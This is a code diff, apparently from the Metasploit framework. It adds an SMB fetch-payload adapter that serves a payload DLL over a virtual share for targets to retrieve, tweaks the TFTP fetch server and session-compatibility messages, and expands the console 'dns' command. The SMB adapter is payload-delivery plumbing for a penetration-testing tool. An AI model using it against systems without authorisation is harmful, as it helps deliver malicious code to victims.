@fetch_virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(share_name)
|
||||
# the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here
|
||||
@fetch_virtual_disk.add_static_file(share_path, srvexe)
|
||||
fetch_service.add_share(@fetch_virtual_disk)
|
||||
fetch_service
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
vprint_status("Received SMB connection from #{client.peerhost}")
|
||||
end
|
||||
end
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::TFTP
|
||||
|
||||
def start_tftp_server(srvport, srvhost)
|
||||
vprint_status("Starting TFTP server on #{srvhost}:#{srvport}")
|
||||
vprint_status("Starting TFTP server on #{Rex::Socket.to_authority(srvhost, srvport)}")
|
||||
Rex::Proto::TFTP::Server.new(srvport, srvhost, {})
|
||||
end
|
||||
|
||||
@@ -14,7 +14,7 @@ module Msf::Payload::Adapter::Fetch::Server::TFTP
|
||||
)
|
||||
end
|
||||
def cleanup_tftp_fetch_service(fetch_service)
|
||||
fetch_service.stop unless fetch_service.nil?
|
||||
fetch_service.stop
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
@@ -25,7 +25,7 @@ module Msf::Payload::Adapter::Fetch::Server::TFTP
|
||||
fetch_service = start_tftp_server(srvport, srvhost)
|
||||
if fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{srvhost}:#{srvport}\n #{e}")
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{srvhost}:#{srvport}\n#{e}")
|
||||
end
|
||||
fetch_service.register_file(srvuri, srvexe, datastore['FETCH_SRVONCE'])
|
||||
fetch_service.start
|
||||
|
||||
@@ -0,0 +1,42 @@
|
||||
module Msf::Payload::Adapter::Fetch::SMB
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Payload::Adapter
|
||||
include Msf::Payload::Adapter::Fetch
|
||||
include Msf::Payload::Adapter::Fetch::Server::SMB
|
||||
|
||||
|
||||
def initialize(*args)
|
||||
super
|
||||
register_options(
|
||||
[
|
||||
Msf::OptString.new('FETCH_FILENAME', [ true, 'Payload file name to fetch; cannot contain spaces or slashes.', 'test.dll'], regex: /^[^\s\/\\]*$/),
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
'SMB'
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
if @fetch_service
|
||||
cleanup_smb_fetch_service(@fetch_service)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def setup_handler
|
||||
@fetch_service = start_smb_fetch_handler(fetch_bindport, fetch_bindhost, srvuri + "\\#{datastore['FETCH_FILENAME']}", @srvexe)
|
||||
super
|
||||
end
|
||||
|
||||
def unc
|
||||
path = "\\\\#{srvhost}"
|
||||
path << "\\#{srvuri.gsub('/', "\\").chomp("\\")}"
|
||||
path << "\\#{datastore['FETCH_FILENAME']}" if datastore['FETCH_FILENAME'].present?
|
||||
path
|
||||
end
|
||||
end
|
||||
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::TFTP
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
cleanup_tftp_fetch_service(@fetch_service)
|
||||
if @fetch_service
|
||||
cleanup_tftp_fetch_service(@fetch_service)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
@@ -19,4 +23,4 @@ module Msf::Payload::Adapter::Fetch::TFTP
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
@@ -99,7 +99,7 @@ module Msf
|
||||
# @return [Boolean] true if sqlcmd is present
|
||||
def check_sqlcmd
|
||||
result = run_cmd('sqlcmd -?')
|
||||
result =~ /SQL Server Command Line Tool/i
|
||||
result =~ /SQL Server Command Line Tool|Version v\d+/i
|
||||
end
|
||||
|
||||
# Runs a SQL query using the identified command line tool
|
||||
|
||||
@@ -74,7 +74,9 @@ module Msf
|
||||
#
|
||||
# Default cleanup handler does nothing
|
||||
#
|
||||
def cleanup; end
|
||||
def cleanup
|
||||
super if defined?(super)
|
||||
end
|
||||
|
||||
#
|
||||
# Return the associated session or nil if there isn't one
|
||||
@@ -188,7 +190,7 @@ module Msf
|
||||
|
||||
# Can't be compatible if it's the wrong type
|
||||
if session_types && !session_types.include?(s.type)
|
||||
issues << "incompatible session type: #{s.type}"
|
||||
issues << "incompatible session type: #{s.type}. This module works with: #{session_types.join(', ')}."
|
||||
end
|
||||
|
||||
# Check to make sure architectures match
|
||||
@@ -208,9 +210,9 @@ module Msf
|
||||
|
||||
if platform && platform.is_a?(Msf::Module::PlatformList) && !platform.empty?
|
||||
if s.platform.blank?
|
||||
issues << 'Unknown session platform'
|
||||
issues << "Unknown session platform. This module works with: #{platform.names.join(', ')}."
|
||||
elsif !platform.supports?(Msf::Module::PlatformList.transform(s.platform))
|
||||
issues << "incompatible session platform: #{s.platform}"
|
||||
issues << "incompatible session platform: #{s.platform}. This module works with: #{platform.names.join(', ')}."
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
@@ -423,15 +423,6 @@ class Db
|
||||
[ '-C', '--columns-until-restart' ] => [ true, 'Only show the given columns until the next restart (see list below)', '<columns>' ],
|
||||
)
|
||||
|
||||
def cmd_hosts_help(default_columns)
|
||||
print_line "Usage: hosts [ options ] [addr1 addr2 ...]"
|
||||
print_line
|
||||
print @@hosts_opts.usage
|
||||
print_line
|
||||
print_line "Available columns: #{default_columns.join(", ")}"
|
||||
print_line
|
||||
end
|
||||
|
||||
def cmd_hosts(*args)
|
||||
return unless active?
|
||||
onlyup = false
|
||||
@@ -487,7 +478,12 @@ class Db
|
||||
@@hosts_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when '-h', '--help'
|
||||
cmd_hosts_help(default_columns)
|
||||
print_line "Usage: hosts [ options ] [addr1 addr2 ...]"
|
||||
print_line
|
||||
print @@hosts_opts.usage
|
||||
print_line
|
||||
print_line "Available columns: #{default_columns.join(", ")}"
|
||||
print_line
|
||||
return
|
||||
when '-a', '--add'
|
||||
mode << :add
|
||||
@@ -698,12 +694,12 @@ class Db
|
||||
[]
|
||||
end
|
||||
|
||||
def cmd_services_help(default_columns)
|
||||
def cmd_services_help
|
||||
print_line "Usage: services [-h] [-u] [-a] [-r <proto>] [-p <port1,port2>] [-s <name1,name2>] [-o <filename>] [addr1 addr2 ...]"
|
||||
print_line
|
||||
print @@services_opts.usage
|
||||
print_line
|
||||
print_line "Available columns: #{default_columns.join(", ")}"
|
||||
print_line "Available columns: #{@@services_columns.join(", ")}"
|
||||
print_line
|
||||
end
|
||||
|
||||
@@ -918,7 +914,7 @@ class Db
|
||||
search_term = val
|
||||
opts[:search_term] = search_term
|
||||
when '-h', '--help'
|
||||
cmd_services_help(@@services_columns)
|
||||
cmd_services_help
|
||||
return
|
||||
else
|
||||
# Anything that wasn't an option is a host to search for
|
||||
|
||||
@@ -9,13 +9,32 @@ class DNS
|
||||
|
||||
include Msf::Ui::Console::CommandDispatcher
|
||||
|
||||
ADD_USAGE = 'dns [add] [--index <insertion index>] [--rule <wildcard DNS entry>] [--session <session id>] <resolver> ...'.freeze
|
||||
@@add_opts = Rex::Parser::Arguments.new(
|
||||
['-r', '--rule'] => [true, 'Set a DNS wildcard entry to match against' ],
|
||||
['-s', '--session'] => [true, 'Force the DNS request to occur over a particular channel (override routing rules)' ],
|
||||
['-i', '--index'] => [true, 'Index to insert at'],
|
||||
['-r', '--rule'] => [true, 'Set a DNS wildcard entry to match against'],
|
||||
['-s', '--session'] => [true, 'Force the DNS request to occur over a particular channel (override routing rules)']
|
||||
)
|
||||
|
||||
ADD_STATIC_USAGE = 'dns [add-static] <hostname> <IP address> ...'.freeze
|
||||
|
||||
REMOVE_USAGE = 'dns [remove/del] -i <entry id> [-i <entry id> ...]'.freeze
|
||||
@@remove_opts = Rex::Parser::Arguments.new(
|
||||
['-i'] => [true, 'Index to remove']
|
||||
['-i', '--index'] => [true, 'Index to remove at']
|
||||
)
|
||||
|
||||
REMOVE_STATIC_USAGE = 'dns [remove-static] <hostname> [<IP address> ...]'.freeze
|
||||
|
||||
RESET_CONFIG_USAGE = 'dns [reset-config] [-y/--yes] [--system]'.freeze
|
||||
@@reset_config_opts = Rex::Parser::Arguments.new(
|
||||
['-y', '--yes'] => [false, 'Assume yes and do not prompt for confirmation before resetting'],
|
||||
['--system'] => [false, 'Include the system resolver']
|
||||
)
|
||||
|
||||
RESOLVE_USAGE = 'dns [resolve] [-f <address family>] <hostname> ...'.freeze
|
||||
@@resolve_opts = Rex::Parser::Arguments.new(
|
||||
# same usage syntax as Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Stdapi
|
||||
['-f'] => [true, 'Address family - IPv4 or IPv6 (default IPv4)']
|
||||
)
|
||||
|
||||
def initialize(driver)
|
||||
@@ -31,7 +50,7 @@ class DNS
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::DNS_FEATURE)
|
||||
commands = {
|
||||
'dns' => "Manage Metasploit's DNS resolving behaviour"
|
||||
'dns' => "Manage Metasploit's DNS resolving behaviour"
|
||||
}
|
||||
end
|
||||
commands
|
||||
@@ -46,16 +65,13 @@ class DNS
|
||||
def cmd_dns_tabs(str, words)
|
||||
return if driver.framework.dns_resolver.nil?
|
||||
|
||||
subcommands = %w[ add add-static delete flush-cache flush-entries flush-static help print query remove remove-static reset-config resolve ]
|
||||
if words.length == 1
|
||||
options = ['add','del','remove','purge','print']
|
||||
return options.select { |opt| opt.start_with?(str) }
|
||||
return subcommands.select { |opt| opt.start_with?(str) }
|
||||
end
|
||||
|
||||
cmd = words[1]
|
||||
case cmd
|
||||
when 'purge','print'
|
||||
# These commands don't have any arguments
|
||||
return
|
||||
when 'add'
|
||||
# We expect a repeating pattern of tag (e.g. -r) and then a value (e.g. *.metasploit.com)
|
||||
# Once this pattern is violated, we're just specifying DNS servers at that point.
|
||||
@@ -63,19 +79,19 @@ class DNS
|
||||
if words.length > 2
|
||||
words[2..-1].each do |word|
|
||||
if tag_is_expected && !word.start_with?('-')
|
||||
return # They're trying to specify a DNS server - we can't help them from here on out
|
||||
return
|
||||
end
|
||||
tag_is_expected = !tag_is_expected
|
||||
end
|
||||
end
|
||||
|
||||
case words[-1]
|
||||
when '-s', '--session'
|
||||
session_ids = driver.framework.sessions.keys.map { |k| k.to_s }
|
||||
return session_ids.select { |id| id.start_with?(str) }
|
||||
when '-r', '--rule'
|
||||
# Hard to auto-complete a rule with any meaningful value; just return
|
||||
return
|
||||
when '-s', '--session'
|
||||
session_ids = driver.framework.sessions.keys.map { |k| k.to_s }
|
||||
return session_ids.select { |id| id.start_with?(str) }
|
||||
when /^-/
|
||||
# Unknown tag
|
||||
return
|
||||
@@ -84,53 +100,85 @@ class DNS
|
||||
options = @@add_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
options << '' # Prevent tab-completion of a dash, given they could provide an IP address at this point
|
||||
return options
|
||||
when 'del','remove'
|
||||
when 'add-static'
|
||||
if words.length == 2
|
||||
# tab complete existing hostnames because they can have more than one IP address
|
||||
return resolver.static_hostnames.each.select { |hostname,_| hostname.downcase.start_with?(str.downcase) }.map { |hostname,_| hostname }
|
||||
end
|
||||
when 'help'
|
||||
# These commands don't have any arguments
|
||||
return subcommands.select { |sc| sc.start_with?(str) }
|
||||
when 'remove','delete'
|
||||
if words[-1] == '-i'
|
||||
ids = driver.framework.dns_resolver.nameserver_entries.flatten.map { |entry| entry[:id].to_s }
|
||||
return ids.select { |id| id.start_with? str }
|
||||
return
|
||||
else
|
||||
return @@remove_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
end
|
||||
when 'remove-static'
|
||||
if words.length == 2
|
||||
return resolver.static_hostnames.each.select { |hostname,_| hostname.downcase.start_with?(str.downcase) }.map { |hostname,_| hostname }
|
||||
elsif words.length > 2
|
||||
hostname = words[2]
|
||||
ip_addresses = resolver.static_hostnames.get(hostname, Dnsruby::Types::A) + resolver.static_hostnames.get(hostname, Dnsruby::Types::AAAA)
|
||||
return ip_addresses.map(&:to_s).select { |ip_address| ip_address.start_with?(str) }
|
||||
end
|
||||
when 'reset-config'
|
||||
@@reset_config_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
when 'resolve','query'
|
||||
if words[-1] == '-f'
|
||||
families = %w[ IPv4 IPv6 ] # The family argument is case-insensitive
|
||||
return families.select { |family| family.downcase.start_with?(str.downcase) }
|
||||
else
|
||||
@@resolve_opts.option_keys.select { |opt| opt.start_with?(str) }
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_dns_help
|
||||
def cmd_dns_help(*args)
|
||||
if args.first.present?
|
||||
handler = "#{args.first.gsub('-', '_')}_dns"
|
||||
if respond_to?("#{handler}_help")
|
||||
# if it is a valid command with dedicated help information
|
||||
return send("#{handler}_help")
|
||||
elsif respond_to?(handler)
|
||||
# if it is a valid command without dedicated help information
|
||||
print_error("No help menu is available for #{args.first}")
|
||||
return
|
||||
else
|
||||
print_error("Invalid subcommand: #{args.first}")
|
||||
end
|
||||
end
|
||||
|
||||
print_line "Manage Metasploit's DNS resolution behaviour"
|
||||
print_line
|
||||
print_line "Usage:"
|
||||
print_line " dns [add] [--session <session_id>] [--rule <wildcard DNS entry>] <IP Address> <IP Address> ..."
|
||||
print_line " dns [remove/del] -i <entry id> [-i <entry id> ...]"
|
||||
print_line " dns [purge]"
|
||||
print_line "USAGE:"
|
||||
print_line " #{ADD_USAGE}"
|
||||
print_line " #{ADD_STATIC_USAGE}"
|
||||
print_line " #{REMOVE_USAGE}"
|
||||
print_line " #{REMOVE_STATIC_USAGE}"
|
||||
print_line " dns [flush-cache]"
|
||||
print_line " dns [flush-entries]"
|
||||
print_line " dns [flush-static]"
|
||||
print_line " dns [print]"
|
||||
print_line " #{RESET_CONFIG_USAGE}"
|
||||
print_line " #{RESOLVE_USAGE}"
|
||||
print_line " dns [help] [subcommand]"
|
||||
print_line
|
||||
print_line "Subcommands:"
|
||||
print_line " add - add a DNS resolution entry to resolve certain domain names through a particular DNS server"
|
||||
print_line " remove - delete a DNS resolution entry; 'del' is an alias"
|
||||
print_line " purge - remove all DNS resolution entries"
|
||||
print_line " print - show all active DNS resolution entries"
|
||||
print_line "SUBCOMMANDS:"
|
||||
print_line " add - Add a DNS resolution entry to resolve certain domain names through a particular DNS resolver"
|
||||
print_line " add-static - Add a statically defined hostname"
|
||||
print_line " flush-cache - Remove all cached DNS answers"
|
||||
print_line " flush-entries - Remove all configured DNS resolution entries"
|
||||
print_line " flush-static - Remove all statically defined hostnames"
|
||||
print_line " print - Show all configured DNS resolution entries"
|
||||
print_line " remove - Delete a DNS resolution entry"
|
||||
print_line " remove-static - Delete a statically defined hostname"
|
||||
print_line " reset-config - Reset the DNS configuration"
|
||||
print_line " resolve - Resolve a hostname"
|
||||
print_line
|
||||
print_line "Examples:"
|
||||
print_line " Display all current DNS nameserver entries"
|
||||
print_line " dns"
|
||||
print_line " dns print"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10"
|
||||
print_line " route add --rule *.metasploit.com 192.168.1.10"
|
||||
print_line
|
||||
print_line " Add multiple entries at once"
|
||||
print_line " route add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2"
|
||||
print_line " route add --session 2 --rule *.metasploit.com 192.168.1.10"
|
||||
print_line
|
||||
print_line " Delete the DNS resolution rule with ID 3"
|
||||
print_line " route remove -i 3"
|
||||
print_line
|
||||
print_line " Delete multiple entries in one command"
|
||||
print_line " route remove -i 3 -i 4 -i 5"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for all requests that match no rules"
|
||||
print_line " route add 8.8.8.8 8.8.4.4"
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Display help information for the 'add' subcommand"
|
||||
print_line " dns help add"
|
||||
print_line
|
||||
end
|
||||
|
||||
@@ -143,7 +191,14 @@ class DNS
|
||||
args << 'print' if args.length == 0
|
||||
# Short-circuit help
|
||||
if args.delete("-h") || args.delete("--help")
|
||||
cmd_dns_help
|
||||
subcommand = args.first
|
||||
if subcommand && respond_to?("#{subcommand.gsub('-', '_')}_dns_help")
|
||||
# if it is a valid command with dedicated help information
|
||||
send("#{subcommand.gsub('-', '_')}_dns_help")
|
||||
else
|
||||
# otherwise print the top-level help information
|
||||
cmd_dns_help
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
@@ -152,14 +207,26 @@ class DNS
|
||||
case action
|
||||
when "add"
|
||||
add_dns(*args)
|
||||
when "remove", "del"
|
||||
remove_dns(*args)
|
||||
when "purge"
|
||||
purge_dns
|
||||
when "add-static"
|
||||
add_static_dns(*args)
|
||||
when "flush-entries"
|
||||
flush_entries_dns
|
||||
when "flush-cache"
|
||||
flush_cache_dns
|
||||
when "flush-static"
|
||||
flush_static_dns
|
||||
when "help"
|
||||
cmd_dns_help(*args)
|
||||
when "print"
|
||||
print_dns
|
||||
when "help"
|
||||
cmd_dns_help
|
||||
when "remove", "rm", "delete", "del"
|
||||
remove_dns(*args)
|
||||
when "remove-static"
|
||||
remove_static_dns(*args)
|
||||
when "reset-config"
|
||||
reset_config_dns(*args)
|
||||
when "resolve", "query"
|
||||
resolve_dns(*args)
|
||||
else
|
||||
print_error("Invalid command. To view help: dns -h")
|
||||
end
|
||||
@@ -169,19 +236,27 @@ class DNS
|
||||
end
|
||||
|
||||
def add_dns(*args)
|
||||
rules = []
|
||||
rules = ['*']
|
||||
first_rule = true
|
||||
comm = nil
|
||||
servers = []
|
||||
resolvers = []
|
||||
index = -1
|
||||
@@add_opts.parse(args) do |opt, idx, val|
|
||||
unless servers.empty? || opt.nil?
|
||||
unless resolvers.empty? || opt.nil?
|
||||
raise ::ArgumentError.new("Invalid command near #{opt}")
|
||||
end
|
||||
case opt
|
||||
when '--rule', '-r'
|
||||
when '-i', '--index'
|
||||
raise ::ArgumentError.new("Not a valid index: #{val}") unless val.to_i > 0
|
||||
|
||||
index = val.to_i - 1
|
||||
when '-r', '--rule'
|
||||
raise ::ArgumentError.new('No rule specified') if val.nil?
|
||||
|
||||
rules.clear if first_rule # if the user defines even one rule, clear the defaults
|
||||
first_rule = false
|
||||
rules << val
|
||||
when '--session', '-s'
|
||||
when '-s', '--session'
|
||||
if val.nil?
|
||||
raise ::ArgumentError.new('No session specified')
|
||||
end
|
||||
@@ -192,42 +267,179 @@ class DNS
|
||||
|
||||
comm = val
|
||||
when nil
|
||||
servers << val
|
||||
resolvers << val
|
||||
else
|
||||
raise ::ArgumentError.new("Unknown flag: #{opt}")
|
||||
end
|
||||
end
|
||||
|
||||
# The remaining args should be the DNS servers
|
||||
|
||||
if servers.length < 1
|
||||
raise ::ArgumentError.new("You must specify at least one DNS server")
|
||||
if resolvers.length < 1
|
||||
raise ::ArgumentError.new('You must specify at least one upstream DNS resolver')
|
||||
end
|
||||
|
||||
servers.each do |host|
|
||||
unless Rex::Socket.is_ip_addr?(host)
|
||||
raise ::ArgumentError.new("Invalid DNS server: #{host}")
|
||||
resolvers.each do |resolver|
|
||||
unless Rex::Proto::DNS::UpstreamRule.valid_resolver?(resolver)
|
||||
raise ::ArgumentError.new("Invalid DNS resolver: #{resolver}")
|
||||
end
|
||||
end
|
||||
|
||||
comm_obj = nil
|
||||
|
||||
unless comm.nil?
|
||||
raise ::ArgumentError.new("Not a valid number: #{comm}") unless comm =~ /^\d+$/
|
||||
comm_int = comm.to_i
|
||||
raise ::ArgumentError.new("Session does not exist: #{comm}") unless driver.framework.sessions.include?(comm_int)
|
||||
comm_obj = driver.framework.sessions[comm_int]
|
||||
raise ::ArgumentError.new("Not a valid session: #{comm}") unless comm =~ /\A-?[0-9]+\Z/
|
||||
|
||||
comm_obj = driver.framework.sessions.get(comm.to_i)
|
||||
raise ::ArgumentError.new("Session does not exist: #{comm}") unless comm_obj
|
||||
raise ::ArgumentError.new("Socket Comm (Session #{comm}) does not implement Rex::Socket::Comm") unless comm_obj.is_a? ::Rex::Socket::Comm
|
||||
|
||||
if resolvers.any? { |resolver| SPECIAL_RESOLVERS.include?(resolver.downcase) }
|
||||
print_warning("The session argument will be ignored for the system resolver")
|
||||
end
|
||||
end
|
||||
|
||||
rules.each do |rule|
|
||||
rules.each_with_index do |rule, offset|
|
||||
print_warning("DNS rule #{rule} does not contain wildcards, so will not match subdomains") unless rule.include?('*')
|
||||
driver.framework.dns_resolver.add_upstream_rule(
|
||||
resolvers,
|
||||
comm: comm_obj,
|
||||
wildcard: rule,
|
||||
index: (index == -1 ? -1 : offset + index)
|
||||
)
|
||||
end
|
||||
|
||||
# Split each DNS server entry up into a separate entry
|
||||
servers.each do |server|
|
||||
driver.framework.dns_resolver.add_nameserver(rules, server, comm_obj)
|
||||
print_good("#{rules.length} DNS #{rules.length > 1 ? 'entries' : 'entry'} added")
|
||||
end
|
||||
|
||||
def add_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{ADD_USAGE}"
|
||||
print_line @@add_opts.usage
|
||||
print_line "RESOLVERS:"
|
||||
print_line " ipv4 / ipv6 address - The IP address of an upstream DNS server to resolve from"
|
||||
print_line " blackhole - Drop all queries"
|
||||
print_line " static - Reply with statically configured addresses (only for A/AAAA records)"
|
||||
print_line " system - Use the host operating systems DNS resolution functionality (only for A/AAAA records)"
|
||||
print_line
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10"
|
||||
print_line " dns add --rule *.metasploit.com 192.168.1.10"
|
||||
print_line
|
||||
print_line " Add multiple entries at once"
|
||||
print_line " dns add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11"
|
||||
print_line
|
||||
print_line " Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2"
|
||||
print_line " dns add --session 2 --rule *.metasploit.com 192.168.1.10"
|
||||
end
|
||||
|
||||
def add_static_dns(*args)
|
||||
if args.length < 2
|
||||
raise ::ArgumentError.new('A hostname and IP address must be provided')
|
||||
end
|
||||
print_good("#{servers.length} DNS #{servers.length > 1 ? 'entries' : 'entry'} added")
|
||||
|
||||
hostname = args.shift
|
||||
if !Rex::Proto::DNS::StaticHostnames.is_valid_hostname?(hostname)
|
||||
raise ::ArgumentError.new("Invalid hostname: #{hostname}")
|
||||
end
|
||||
|
||||
ip_addresses = args
|
||||
if (ip_address = ip_addresses.find { |a| !Rex::Socket.is_ip_addr?(a) })
|
||||
raise ::ArgumentError.new("Invalid IP address: #{ip_address}")
|
||||
end
|
||||
|
||||
ip_addresses.each do |ip_address|
|
||||
resolver.static_hostnames.add(hostname, ip_address)
|
||||
print_status("Added static hostname mapping #{hostname} to #{ip_address}")
|
||||
end
|
||||
end
|
||||
|
||||
def add_static_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{ADD_STATIC_USAGE}"
|
||||
print_line
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Define a static entry mapping localhost6 to ::1"
|
||||
print_line " dns add-static localhost6 ::1"
|
||||
end
|
||||
|
||||
#
|
||||
# Query a hostname using the configuration. This is useful for debugging and
|
||||
# inspecting the active settings.
|
||||
#
|
||||
def resolve_dns(*args)
|
||||
names = []
|
||||
query_type = Dnsruby::Types::A
|
||||
|
||||
@@resolve_opts.parse(args) do |opt, idx, val|
|
||||
unless names.empty? || opt.nil?
|
||||
raise ::ArgumentError.new("Invalid command near #{opt}")
|
||||
end
|
||||
case opt
|
||||
when '-f'
|
||||
case val.downcase
|
||||
when 'ipv4'
|
||||
query_type = Dnsruby::Types::A
|
||||
when'ipv6'
|
||||
query_type = Dnsruby::Types::AAAA
|
||||
else
|
||||
raise ::ArgumentError.new("Invalid family: #{val}")
|
||||
end
|
||||
when nil
|
||||
names << val
|
||||
else
|
||||
raise ::ArgumentError.new("Unknown flag: #{opt}")
|
||||
end
|
||||
end
|
||||
|
||||
if names.length < 1
|
||||
raise ::ArgumentError.new('You must specify at least one hostname to resolve')
|
||||
end
|
||||
|
||||
tbl = Table.new(
|
||||
Table::Style::Default,
|
||||
'Header' => 'Host resolutions',
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => ['Hostname', 'IP Address', 'Rule #', 'Rule', 'Resolver', 'Comm channel'],
|
||||
'SortIndex' => -1,
|
||||
'WordWrap' => false
|
||||
)
|
||||
names.each do |name|
|
||||
upstream_rule = resolver.upstream_rules.find { |ur| ur.matches_name?(name) }
|
||||
if upstream_rule.nil?
|
||||
tbl << [name, '[Failed To Resolve]', '', '', '', '']
|
||||
next
|
||||
end
|
||||
|
||||
upstream_rule_idx = resolver.upstream_rules.index(upstream_rule) + 1
|
||||
|
||||
begin
|
||||
result = resolver.query(name, query_type)
|
||||
rescue NoResponseError
|
||||
tbl = append_resolver_cells!(tbl, upstream_rule, prefix: [name, '[Failed To Resolve]'], index: upstream_rule_idx)
|
||||
else
|
||||
if result.answer.empty?
|
||||
tbl = append_resolver_cells!(tbl, upstream_rule, prefix: [name, '[Failed To Resolve]'], index: upstream_rule_idx)
|
||||
else
|
||||
result.answer.select do |answer|
|
||||
answer.type == query_type
|
||||
end.map(&:address).map(&:to_s).each do |address|
|
||||
tbl = append_resolver_cells!(tbl, upstream_rule, prefix: [name, address], index: upstream_rule_idx)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
print(tbl.to_s)
|
||||
end
|
||||
|
||||
def resolve_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{RESOLVE_USAGE}"
|
||||
print_line @@resolve_opts.usage
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Resolve a hostname to an IPv6 address using the current configuration"
|
||||
print_line " dns resolve -f IPv6 www.metasploit.com"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
@@ -237,52 +449,225 @@ class DNS
|
||||
remove_ids = []
|
||||
@@remove_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when '-i'
|
||||
raise ::ArgumentError.new("Not a valid number: #{val}") unless val =~ /^\d+$/
|
||||
remove_ids << val.to_i
|
||||
when '-i', '--index'
|
||||
raise ::ArgumentError.new("Not a valid index: #{val}") unless val.to_i > 0
|
||||
|
||||
remove_ids << val.to_i - 1
|
||||
end
|
||||
end
|
||||
|
||||
removed = driver.framework.dns_resolver.remove_ids(remove_ids)
|
||||
difference = remove_ids.difference(removed.map { |entry| entry[:id] })
|
||||
print_warning("Some entries were not removed: #{difference.join(', ')}") unless difference.empty?
|
||||
if removed.length > 0
|
||||
print_good("#{removed.length} DNS #{removed.length > 1 ? 'entries' : 'entry'} removed")
|
||||
print_dns_set('Deleted entries', removed)
|
||||
if remove_ids.empty?
|
||||
raise ::ArgumentError.new('At least one index to remove must be provided')
|
||||
end
|
||||
|
||||
removed = resolver.remove_ids(remove_ids)
|
||||
print_warning('Some entries were not removed') unless removed.length == remove_ids.length
|
||||
if removed.length > 0
|
||||
print_good("#{removed.length} DNS #{removed.length > 1 ? 'entries' : 'entry'} removed")
|
||||
print_dns_set('Deleted entries', removed, ids: [nil] * removed.length)
|
||||
end
|
||||
end
|
||||
|
||||
def remove_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{REMOVE_USAGE}"
|
||||
print_line(@@remove_opts.usage)
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Delete the DNS resolution rule #3"
|
||||
print_line " dns remove -i 3"
|
||||
print_line
|
||||
print_line " Delete multiple rules in one command"
|
||||
print_line " dns remove -i 3 -i 4 -i 5"
|
||||
print_line
|
||||
end
|
||||
|
||||
def remove_static_dns(*args)
|
||||
if args.length < 1
|
||||
raise ::ArgumentError.new('A hostname must be provided')
|
||||
end
|
||||
|
||||
hostname = args.shift
|
||||
if !Rex::Proto::DNS::StaticHostnames.is_valid_hostname?(hostname)
|
||||
raise ::ArgumentError.new("Invalid hostname: #{hostname}")
|
||||
end
|
||||
|
||||
ip_addresses = args
|
||||
if ip_addresses.empty?
|
||||
ip_addresses = resolver.static_hostnames.get(hostname, Dnsruby::Types::A) + resolver.static_hostnames.get(hostname, Dnsruby::Types::AAAA)
|
||||
if ip_addresses.empty?
|
||||
print_status("There are no definitions for hostname: #{hostname}")
|
||||
end
|
||||
elsif (ip_address = ip_addresses.find { |ip| !Rex::Socket.is_ip_addr?(ip) })
|
||||
raise ::ArgumentError.new("Invalid IP address: #{ip_address}")
|
||||
end
|
||||
|
||||
ip_addresses.each do |ip_address|
|
||||
resolver.static_hostnames.delete(hostname, ip_address)
|
||||
print_status("Removed static hostname mapping #{hostname} to #{ip_address}")
|
||||
end
|
||||
end
|
||||
|
||||
def remove_static_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{REMOVE_STATIC_USAGE}"
|
||||
print_line
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Remove all IPv4 and IPv6 addresses for 'localhost'"
|
||||
print_line " dns remove-static localhost"
|
||||
print_line
|
||||
end
|
||||
|
||||
def reset_config_dns(*args)
|
||||
add_system_resolver = false
|
||||
should_confirm = true
|
||||
@@reset_config_opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when '--system'
|
||||
add_system_resolver = true
|
||||
when '-y', '--yes'
|
||||
should_confirm = false
|
||||
end
|
||||
end
|
||||
|
||||
if should_confirm
|
||||
print("Are you sure you want to reset the DNS configuration? [y/N]: ")
|
||||
response = gets.downcase.chomp
|
||||
return unless response =~ /^y/i
|
||||
end
|
||||
